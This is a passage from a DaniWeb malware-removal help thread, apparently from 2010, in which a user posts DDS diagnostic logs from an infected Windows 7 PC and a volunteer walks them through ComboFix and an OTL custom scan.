2010-09-08 05:36:17 1192960 ----a-w-    C:\Windows\System32\wininet.dll
2010-09-08 05:34:34 57856   ----a-w-    C:\Windows\System32\licmgr10.dll
2010-09-08 04:30:04 978432  ----a-w-    C:\Windows\SysWow64\wininet.dll
2010-09-08 04:28:15 44544   ----a-w-    C:\Windows\SysWow64\licmgr10.dll
2010-09-08 04:16:38 482816  ----a-w-    C:\Windows\System32\html.iec
2010-09-08 03:22:31 386048  ----a-w-    C:\Windows\SysWow64\html.iec
2010-09-08 02:48:16 1638912 ----a-w-    C:\Windows\SysWow64\mshtml.tlb
2010-09-04 16:53:58 2931712 ----a-w-    C:\Windows\SysWow64\x264vfw.dll
2010-08-21 06:29:47 558592  ----a-w-    C:\Windows\System32\spoolsv.exe
2010-07-29 06:30:34 82944   ----a-w-    C:\Windows\SysWow64\iccvid.dll
2006-05-03 09:06:54 163328  --sh--r-    C:\Windows\SysWOW64\flvDX.dll
2007-02-21 10:47:16 31232   --sh--r-    C:\Windows\SysWOW64\msfDX.dll
2008-03-16 12:30:52 216064  --sh--r-    C:\Windows\SysWOW64\nbDX.dll

============= FINISH: 16:47:43.74 ===============

And here's Attach.txt

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT

DDS (Ver_10-10-21.02)

Microsoft Windows 7 Ultimate 
Boot Device: \Device\HarddiskVolume2
Install Date: 2/3/2010 10:31:33 PM
System Uptime: 10/18/2010 4:42:56 PM (0 hours ago)

Motherboard:                        |  | N68PV-GS
Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 5000+ | CPUSocket | 2600/200mhz

==== Disk Partitions =========================

C: is FIXED (NTFS) - 98 GiB total, 32.15 GiB free.
D: is CDROM ()
F: is FIXED (NTFS) - 135 GiB total, 23.529 GiB free.
G: is FIXED (NTFS) - 75 GiB total, 68.776 GiB free.

==== Disabled Device Manager Items =============

Class GUID: {36fc9e60-c465-11cf-8056-444553540000}
Description: Unknown Device
Device ID: USB\VID_0000&PID_0000\5&3225574&0&1
Manufacturer: (Standard USB Host Controller)
Name: Unknown Device
PNP Device ID: USB\VID_0000&PID_0000\5&3225574&0&1
Service: 

Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft ISATAP Adapter
Device ID: ROOT\*ISATAP\0000
Manufacturer: Microsoft
Name: Microsoft ISATAP Adapter
PNP Device ID: ROOT\*ISATAP\0000
Service: tunnel

Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft Teredo Tunneling Adapter
Device ID: ROOT\*TEREDO\0000
Manufacturer: Microsoft
Name: Teredo Tunneling Pseudo-Interface
PNP Device ID: ROOT\*TEREDO\0000
Service: tunnel

Class GUID: 
Description: Coprocessor
Device ID: PCI\VEN_10DE&DEV_0543&SUBSYS_05431849&REV_A2\3&267A616A&0&0B
Manufacturer: 
Name: Coprocessor
PNP Device ID: PCI\VEN_10DE&DEV_0543&SUBSYS_05431849&REV_A2\3&267A616A&0&0B
Service: 

==== System Restore Points ===================

RP202: 10/15/2010 3:00:17 AM - Windows Update
RP203: 10/15/2010 1:41:43 PM - Windows Update
RP204: 10/15/2010 6:03:36 PM - Windows Update
RP205: 10/16/2010 4:15:35 PM - Removed Apple Application Support
RP206: 10/16/2010 4:17:39 PM - Removed Substation Alpha 4.08
RP207: 10/16/2010 4:52:47 PM - Configured PRODUCT_NAME
RP208: 10/16/2010 4:55:04 PM - Configured PRODUCT_NAME
RP209: 10/16/2010 4:59:15 PM - Removed PlayStation(R)Store.
RP210: 10/16/2010 5:00:54 PM - Removed iLike Sidebar
RP211: 10/16/2010 5:02:46 PM - Removed Times Reader
RP212: 10/16/2010 5:34:32 PM - Removed Ask Toolbar.
RP213: 10/16/2010 7:11:38 PM - Windows Update
RP214: 10/16/2010 7:15:07 PM - Windows Update
RP215: 10/17/2010 6:54:20 PM - Installed HiJackThis

==== Installed Programs ======================


µTorrent
Adobe AIR
Adobe Flash Player 10 ActiveX
Adobe Flash Player 10 Plugin
Adobe Reader 9.3.4
Adobe Shockwave Player 11.5
Advertising Center
ALWIL Software Security 4.8.1296.0
Any DVD Converter Professional 4.0.7
Any Video Converter Professional 3.0.7
avast! Antivirus
AviSynth 2.5
Browser Defender 2.0.6.15
Combined Community Codec Pack 2009-09-09
DivX Version Checker
DolbyFiles
FlashGet 3.5
HiJackThis
HijackThis 2.0.2
ImagXpress
Java Auto Updater
Java(TM) 6 Update 21
K-Lite Mega Codec Pack 6.4.4
LightScribe System Software
Magic ISO Maker v5.5 (build 0281)
Malwarebytes' Anti-Malware
Media Player Classic - Home Cinema v. 1.3.1249.0
Microsoft Office Professional Edition 2003
Microsoft Silverlight
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319
Microsoft_VC80_ATL_x86
Microsoft_VC80_CRT_x86
Microsoft_VC80_MFC_x86
Microsoft_VC80_MFCLOC_x86
Microsoft_VC90_ATL_x86
Microsoft_VC90_CRT_x86
Microsoft_VC90_MFC_x86
MiniCoder
Mozilla Firefox (3.6.12)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
Nero ControlCenter
Nero Installer
neroxml
Orbit Downloader
Picasa 3
Realtek High Definition Audio Driver
Security Update for Microsoft .NET Framework 4 Client Profile (KB2160841)
Security Update for Microsoft .NET Framework 4 Extended (KB2416472)
Sofonica Folder Soldier 1.4
Spyware Doctor 7.0
SUPER © Version 2010.bld.38 (May 2, 2010)
Uniblue DriverScanner
Uniblue PowerSuite
Uniblue RegistryBooster
Uniblue SpeedUpMyPC
VC80CRTRedist - 8.0.50727.762
VLC media player 1.1.4
Windows Media Player Firefox Plugin
WinRAR archiver
Xilisoft DVD Copy Express
Xilisoft DVD Creator
Xilisoft Video Converter Ultimate 6
Xilisoft YouTube Video Converter
XviD4PSP 5.0
XviD4PSP 6.0
Yahoo! Messenger
Yahoo! Software Update
Yahoo! Toolbar

==== Event Viewer Messages From Past Week ========

10/18/2010 4:37:54 PM, Error: Disk [11]  - The driver detected a controller error on \Device\Harddisk2\DR6.
10/18/2010 12:49:45 PM, Error: Service Control Manager [7032]  - The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Management Instrumentation service, but this action failed with the following error:  An instance of the service is already running.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Windows Update service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Windows Management Instrumentation service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The User Profile Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Themes service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Task Scheduler service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The System Event Notification Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Shell Hardware Detection service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Server service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Multimedia Class Scheduler service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The IKE and AuthIP IPsec Keying Modules service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Group Policy Client service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Background Intelligent Transfer Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031]  - The Application Experience service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:39:59 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x000000f4 (0x0000000000000003, 0xfffffa8004cbe040, 0xfffffa8004cbe320, 0xfffff800039cb5d0). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 101810-21250-01.
10/18/2010 12:16:30 PM, Error: Service Control Manager [7034]  - The PC Tools Security Service service terminated unexpectedly.  It has done this 1 time(s).
10/18/2010 12:14:22 PM, Error: Microsoft-Windows-WMPNSS-Service [14332]  - Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
10/18/2010 1:37:49 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x000000f4 (0x0000000000000003, 0xfffffa800685c060, 0xfffffa800685c340, 0xfffff800039d15d0). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 101810-19921-01.
10/17/2010 9:43:07 PM, Error: Disk [11]  - The driver detected a controller error on \Device\Harddisk2\DR7.
10/17/2010 4:51:02 PM, Error: Disk [11]  - The driver detected a controller error on \Device\Harddisk2\DR87.
10/17/2010 12:19:58 PM, Error: Disk [11]  - The driver detected a controller error on \Device\Harddisk2\DR67.
10/17/2010 1:00:17 AM, Error: Microsoft-Windows-Time-Service [34]  - The time service has detected that the system time needs to be  changed by 909494 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->207.46.197.32:123) is working properly.
10/16/2010 7:13:46 PM, Error: Microsoft-Windows-WindowsUpdateClient [20]  - Installation Failure: Windows failed to install the following update with error 0x80080005: Update for Windows 7 for x64-based Systems (KB2388210).

==== End Of File ===========================

I Thank you & owe you for looking into this.

windows-virus

Edited 11 Years Ago by mike_2000_17 because: Fixed formatting

2 Contributors
3 Replies
582 Views
1 Day Discussion Span
Latest Post 14 Years Ago Latest Post by crunchie

crunchie 990 Most Valuable Poster

14 Years Ago

Got to stay away from those cracks and keygens mate. They are loaded with trojans and who knows what.

==

Please download ComboFix by sUBs from HERE or HERE

You must download it to and run it from your Desktop
Physically disconnect from the internet.
Now STOP all your monitoring programs (Antivirus/Antispyware, Guards and Shields) as they could easily interfere with ComboFix.
Double click combofix.exe & follow the prompts.
When finished, it will produce a log. Please save that log to post in your next reply.
Re-enable all the programs that were disabled during the running of ComboFix..

Note:
Do not mouse-click combofix's window while it is running. That may cause it to stall.

CF disconnects your machine from the internet. The connection is automatically restored before CF completes its run. If CF runs into difficulty and terminates prematurely, the connection can be manually restored by restarting your machine.

Run Combofix ONCE only!!

Reply to this topic

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.

hackimist 0 Newbie Poster · Answer 1 · 2010-10-31T12:31:00+00:00

there's a message that suddenly pop of

Error - Win32 only

Incompatible OS.ComboFix only works for workstations with Windows
2000 and XP

My OS is Windows 7 Ultimate
Processor : AMD Athlon(tm) 64 X2 Dual Core Processor 5000+ 2.60GHz
Installed Memory (RAM) : 2.00 Gb (1.75 GB usable)

Can you please give me another Link please

Thank you. . .

crunchie 990 Most Valuable Poster Team Colleague Featured Poster · Answer 2 · 2010-10-31T12:39:26+00:00

Try this instead;

Download OTL to your Desktop.

* Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
* Under the Custom Scan box paste this in:

netsvcs
%SYSTEMDRIVE%\*.exe
/md5start
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
sceclt.dll
ntelogon.dll
logevent.dll
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
eNetHook.dll
ahcix86.sys
KR10N.sys
nvstor32.sys
/md5stop
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\System32\config\*.sav
CREATERESTOREPOINT

* Click the Quick Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.

When the scan completes, it will open two notepad windows: OTL.txt and Extras.txt. These are saved in the same location as OTL.
Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them back here.